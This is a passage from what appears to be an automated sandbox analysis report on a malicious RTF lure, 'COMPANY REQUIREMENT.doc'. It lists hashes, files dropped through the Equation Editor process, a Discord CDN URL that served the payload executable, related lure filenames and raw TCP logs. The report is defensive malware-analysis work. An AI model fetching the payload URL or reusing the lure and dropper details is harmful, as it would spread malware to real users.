                                      J8OODRQH.exeGet hashmaliciousBrowse
                                      • 131.186.113.70

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      05af1f5ca1b87cc9cc9b25185115607dpfizer_vp.docxGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      evilstuff.docxGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      NEW ORDER.docGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      PO_072_318_90.docGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      SPARE PARTS drawing.docGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      u49FFesjz4.xlsGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      u49FFesjz4.xlsGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      PO_1012_678_91.docGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      Order 122001-220.pptGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      Bon_Commande.BC106823.1602202.docGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      SecuriteInfo.com.Heur.5671.xlsGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      Purchase Order WT-7011 List.xlsGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      rcw890011.xlsGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      PO_1037_Scanned_150.docGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      Datos factura.docGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      New Purchase Order RFQ List - Copy.xlsGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      SecuriteInfo.com.VBA.Heur.ObfDldr.28.D45D1C1C.Gen.24298.xlsmGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      SecuriteInfo.com.VBA.Heur.ObfDldr.28.D45D1C1C.Gen.24298.xlsmGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      Doc7656.xlsxGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      Payment Advice PDF.pptGet hashmaliciousBrowse
                                      • 104.21.19.200
                                      7dcce5b76c8b17472d024758970a406bComplaint-Letter-1973823858-03102021.xlsGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      Complaint-Letter-1973823858-03102021.xlsGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      hse_legal_requirements.xlsGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      ACH WlRE REMITTANCE ADVICE.xlsxGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      pfizer_vp.docxGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      evilstuff.docxGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      subscription_1615477000.xlsGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      unsubscribe_1615476000.xlsGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      Copy 7739588.xlsmGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      Copy 7739588.xlsmGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      Copy 7739588.xlsmGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      unsubscribe_1615388510.xlsGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      subscription_1615388625.xlsGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      cotizacin.docGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      Copy of Invoice 7739588.xlsmGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      SecuriteInfo.com.VB.Heur.EmoDldr.32.A9BE9151.Gen.4945.xlsmGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      SecuriteInfo.com.VB.Heur.EmoDldr.32.81663039.Gen.10010.xlsmGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      iWlLtgXNf8.xlsGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      iWlLtgXNf8.xlsGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      PI.2.5.2021.xlsGet hashmaliciousBrowse
                                      • 162.159.135.233

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\harcout[1].exe
                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:downloaded
                                      Size (bytes):390144
                                      Entropy (8bit):7.863432618538967
                                      Encrypted:false
                                      SSDEEP:6144:vzjwWCVEi9I9Md9xQdZT+O5bBCnDVRzOpsw+tP3b51rCkVO0JJNBQIC:wh9IG9Qd1+ebgnxO+ZrCko4HQIC
                                      MD5:9B568603BDDF210CA155C59A846E206A
                                      SHA1:F7494D64E01BC1090028E08483055597AC552069
                                      SHA-256:34464FFF3F01AACD06AB7B2DD9551220DAC60B69A771B6B29D77E9102865905A
                                      SHA-512:D0D3C5FCCA4FECE248A96F2A5A1CF8CAEFD6133C01EDC922922046C6647C7A6183CDF43BED411058AEC07DFB77B3C4E47C6D0C2944D6BDADF6B7F9F0892FBB79
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 23%
                                      Reputation:low
                                      IE Cache URL:https://cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J`..............0.............V.... ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text...\.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................8.......H....... }..4l......r...T................................................0...........r...p.+..*..0...........r...p.+..*".(.....*&.(......*...0..9........~.........,".r...p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0...........(....rG..p~....o.....+..*...0..9........~.........,".rK..p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0..!........(....r...p~....o......t.....+..*....0...........~.....+..*".(.....*Vs....( ...t
                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\harcout[1].exe
                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):5
                                      Entropy (8bit):1.5219280948873621
                                      Encrypted:false
                                      SSDEEP:3:hn:h
                                      MD5:FDA44910DEB1A460BE4AC5D56D61D837
                                      SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                                      SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                                      SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview: 0....
                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0E979737-30AB-4901-9D2A-3CE504568F55}.tmp
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1024
                                      Entropy (8bit):0.05390218305374581
                                      Encrypted:false
                                      SSDEEP:3:ol3lYdn:4Wn
                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F7C72BCE-A594-453E-90B7-97C10E531855}.tmp
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):11550
                                      Entropy (8bit):3.542484597346296
                                      Encrypted:false
                                      SSDEEP:192:BV6OqN41o0AlkDWzqAY1c2FfsDfL9+2SKcHRDGintXyg5amyBQMvU:BYVlkAufoJ+2SXHUKtXV5azBTvU
                                      MD5:1B82F28BCA109807D8E938310802AE93
                                      SHA1:96F04BD8A9F829B4DF615C013023BCF1B73136B5
                                      SHA-256:56468767F78639F100E78C696EF99C731CF71E8A6D38D8F4C60A48A7536A87A6
                                      SHA-512:323D891A32840593C72051895D78384959694C6E7D4C5A27EDE99BA22A0E7544F157308A156C99C9EBE487B3FA9C8666AD7988E046894248FC7BF2D23AA31043
                                      Malicious:false
                                      Reputation:low
                                      Preview: `./.+.@.*.~.@.#.<.].*.-.+.#.$.?.`.<.1.+.+.9...4.$.?.=._.6./.[.+.|.0.+.!.3...?.3.3.3.0.(.<.<.|.9.-.@.3.<.:.0.6.(.?./.2.).%.@.=.4...?.|.]./.[.+.=.*...6.#./.0...?.(.~.?.6.3.0.4.[.~.?.%.|.@...4.-.@.5...`.1.&.0...;./.:.<.6.^./.3.-.?.<.,...1.>.-.].?.3.<.6...(.~.3.2.$...~.].$...?.&.;.^._...'.,.;.?.5.,.2.+..._.1.7.1.4.=._.0.^.6.#...2.4.!.$.:.[.*.0.].@.].?._.&.@.<.=...2.6.9.$._.[...?.2.0.0.#.+.1.=.=.=...9.5.?.!.%...*._.?.0...?.*.?.].(...4.?.`.|.:.?.-.9./.?.8.@._.<.?.|.~...?.`.&.<.^.&.(.:...[.@.?.].@.&.%.?.].*.^...^.5.;.!.;.|._.%.^.,.^.?.'.0.`.:.|.8._.5.[.!.<.8.$.&.%...1.2...^.,.#.7.~.).?.8.<.1.?.!.|.*.(._...2.:.8.%.8.&.$.~.>.>...=.1.0.[.*.%.;.*.=._.?.).[.@.].4.^.0.=.@.(...'.&.[.+.....3...?.0.2.#._.*.3.<.@.7.3.;...[.1.[.>.$.?.>.,.%.(.?.+.?.1.<...2.^.:.).@.0.`.#.|.>.>.&.1.?.4.*.#.0.'.'.?.2.#.:.&.;.?./.].1.,.<.>.?...|.$.?.+.0.&.1.^.&.?.?.!.,.7.4.?.?...?.|.9.|.).%.'...^.....:.$.5.7.2.?.1.#.=.[.$.0.>.|.#.#...%.|.....?.~.>...1.?.].1.^.+.8.#.6.7.3...|.8.~.?.3.`.|.'.5.8.$.+.#.(.~.,.?.<.0.-.4./.-.;.8.].
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\COMPANY REQUIREMENT.LNK
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Sat Mar 13 00:19:30 2021, length=471883, window=hide
                                      Category:dropped
                                      Size (bytes):2118
                                      Entropy (8bit):4.594178522538528
                                      Encrypted:false
                                      SSDEEP:24:8nk8kun/XTwz6IknLo9XNeENZDv3q3dM7dD2nk8kun/XTwz6IknLo9XNeENZDv3B:8k1E/XT3IkePq3Qh2k1E/XT3IkePq3Q/
                                      MD5:462AC579EBFA115873A4AB29C7FE8A3F
                                      SHA1:389EF0F6386485240DBB3EA3B58CA38EB4410950
                                      SHA-256:060E526BADB2BCA952A18B7604FC385ABEFA3C802FC7ED401CB87CC419661FDF
                                      SHA-512:EAB03528EC8C206D1ABF1B4842006AA084611B6D8365C44EB649847F727FD03E5B868F2571CB474D13AE10BA846000810F4FA7E57914CD045B611508BCB6D2CE
                                      Malicious:false
                                      Reputation:low
                                      Preview: L..................F.... ....0H..{...0H..{...^.....K3...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2.K3..mRp. .COMPAN~1.DOC..\.......Q.y.Q.y*...8.....................C.O.M.P.A.N.Y. .R.E.Q.U.I.R.E.M.E.N.T...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\414408\Users.user\Desktop\COMPANY REQUIREMENT.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.O.M.P.A.N.Y. .R.E.Q.U.I.R.E.M.E.N.T...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......414408..........D_....3N.
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):95
                                      Entropy (8bit):4.542268308163145
                                      Encrypted:false
                                      SSDEEP:3:M1Lrugi3Yq+5krugi3YqmX1Lrugi3Yqv:M5vioBivioJvioU
                                      MD5:BDE9FAF2651E936242D9A39AF85638FB
                                      SHA1:321F26B6C0EDD59E34C3019FE3FA33AB401D53BF
                                      SHA-256:086DCCC38FF295931629F7400EEF5303813CDFD630B6F95797987B60E3265658
                                      SHA-512:F4EFFA7644250D1BFE636180D1E8C4FD61D076669189A400B0C5897785484819C567B94DEFAE522FA4F2D1CAD696848F50D16394222B7A05D9AE0390A4C37667
                                      Malicious:false
                                      Reputation:low
                                      Preview: [doc]..COMPANY REQUIREMENT.LNK=0..COMPANY REQUIREMENT.LNK=0..[doc]..COMPANY REQUIREMENT.LNK=0..
                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):162
                                      Entropy (8bit):2.431160061181642
                                      Encrypted:false
                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIX8D795.txt
                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):116
                                      Entropy (8bit):4.410699422649641
                                      Encrypted:false
                                      SSDEEP:3:GmM/sOSaCgAgYW0TUFccdTFweSNuEdTddbFXIXKOiEUXv:XM/TSaZVbMeZEkHU/
                                      MD5:8D78DE5ABAB0AD0B9C83EA83B7070E94
                                      SHA1:C25357D22E0A474853E2E485B889B57092F57EDB
                                      SHA-256:48549FD163DDB12B4DD89FF81EA9A637243C566AA2D0F1F4E3DE7C782868ECB1
                                      SHA-512:E7C55CC252817B7B38AA31E55D498FF87531AF4E065722003B63ADD362629D9F6600CFE3A2F0F28EF8E681999602C398EBCF828696BB8679CCF0E4A322B0B555
                                      Malicious:false
                                      Reputation:low
                                      Preview: __cfduid.d986c66d71f5240c8e5b0cdaf1fae803b1615565986.discordapp.com/.9728.2092186880.30879470.3272588016.30873511.*.
                                      C:\Users\user\AppData\Roaming\hbmaqbo.exe
                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):390144
                                      Entropy (8bit):7.863432618538967
                                      Encrypted:false
                                      SSDEEP:6144:vzjwWCVEi9I9Md9xQdZT+O5bBCnDVRzOpsw+tP3b51rCkVO0JJNBQIC:wh9IG9Qd1+ebgnxO+ZrCko4HQIC
                                      MD5:9B568603BDDF210CA155C59A846E206A
                                      SHA1:F7494D64E01BC1090028E08483055597AC552069
                                      SHA-256:34464FFF3F01AACD06AB7B2DD9551220DAC60B69A771B6B29D77E9102865905A
                                      SHA-512:D0D3C5FCCA4FECE248A96F2A5A1CF8CAEFD6133C01EDC922922046C6647C7A6183CDF43BED411058AEC07DFB77B3C4E47C6D0C2944D6BDADF6B7F9F0892FBB79
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 23%
                                      Reputation:low
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J`..............0.............V.... ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text...\.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................8.......H....... }..4l......r...T................................................0...........r...p.+..*..0...........r...p.+..*".(.....*&.(......*...0..9........~.........,".r...p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0...........(....rG..p~....o.....+..*...0..9........~.........,".rK..p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0..!........(....r...p~....o......t.....+..*....0...........~.....+..*".(.....*Vs....( ...t
                                      C:\Users\user\Desktop\~$MPANY REQUIREMENT.doc
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):162
                                      Entropy (8bit):2.431160061181642
                                      Encrypted:false
                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                      Malicious:false
                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

                                      Static File Info

                                      General

                                      File type:Rich Text Format data, version 1, unknown character set
                                      Entropy (8bit):4.082795650428771
                                      TrID:
                                      • Rich Text Format (5005/1) 55.56%
                                      • Rich Text Format (4004/1) 44.44%
                                      File name:COMPANY REQUIREMENT.doc
                                      File size:471883
                                      MD5:ab8c927fef01c470fe7206a0b043d763
                                      SHA1:c9420088ea76d0bfdb831d244f248c172eee69fb
                                      SHA256:fd2198f7abdbeaa61d74b78a67eca916ed8297a4889680529ee86a27ca860bdd
                                      SHA512:0a36207e548ac4269afa3684e16dfc6c0196f2acd29f36b74cbb2fcc3ffcc94f59632b64182c3c3c8b9aef02d30f53020a752bb6c711b7b08882952dfee515ab
                                      SSDEEP:12288:E55AWFCVbFkMRZs7J1UYOZKWBSeKPARs8wzHgWDFHz2eh+:WAIC9FkMRaN0cQ3S8wzHDFHzQ
                                      File Content Preview:{\rtf16269`/+@*~@#<]*-+#$?`<1++9.4$?=_6/[+|0+!3.?3330(<<|9-@3<:06(?/2)%@=4.?|]/[+=*.6#/0.?(~?6304[~?%|@.4-@5.`1&0.;/:<6^/3-?<,.1>-]?3<6.(~32$.~]$.?&;^_.',;?5,2+._1714=_0^6#.24!$:[*0]@]?_&@<=.269$_[.?200#+1===.95?!%.*_?0.?*?](.4?`|:?-9/?8@_<?|~.?`&<^&(:.[@

                                      File Icon

                                      Icon Hash:e4eea2aaa4b4b4a4

                                      Static RTF Info

                                      Objects

                                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                      0000014A4h2embeddedEquAtiON.3233162no

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 12, 2021 17:19:45.834750891 CET4916580192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:45.886890888 CET8049165162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:45.887088060 CET4916580192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:45.887872934 CET4916580192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:45.939372063 CET8049165162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:45.947659016 CET8049165162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:45.947776079 CET4916580192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:45.968239069 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.021752119 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.021819115 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.029009104 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.080133915 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.107719898 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.107748985 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.107784033 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.107851982 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.116441965 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.170439005 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.170476913 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.173460007 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.412154913 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.465662003 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.510073900 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.510112047 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.510128975 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.510144949 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.510160923 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.510180950 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.510198116 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.510214090 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.510240078 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.510303020 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.511177063 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.511203051 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.511274099 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.512418985 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.512447119 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.512510061 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.512531042 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.513597012 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.513626099 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.513669968 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.513689041 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.514782906 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.514807940 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.514852047 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.514874935 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.516004086 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.516030073 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.516087055 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.517168045 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.517190933 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.517262936 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.518367052 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.518395901 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.518449068 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.519582987 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.519612074 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.519675016 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.520826101 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.520849943 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.520917892 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.522342920 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.522361994 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.522408009 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.523170948 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.523190022 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.523226023 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.523248911 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.524384022 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.524409056 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.524441004 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.524467945 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.525603056 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.525665998 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.529226065 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.561620951 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.561645985 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.561825037 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.562176943 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.562195063 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.562266111 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.563848972 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.563962936 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.564050913 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.564145088 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.564517021 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.564536095 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.564640045 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.565948009 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.565967083 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.566054106 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.566932917 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.566953897 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.567050934 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.568141937 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.568166018 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.568274021 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.569334984 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.569353104 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.569462061 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.570537090 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.570560932 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.570648909 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.571742058 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.571773052 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.571856976 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.572957039 CET44349166162.159.135.233192.168.2.22
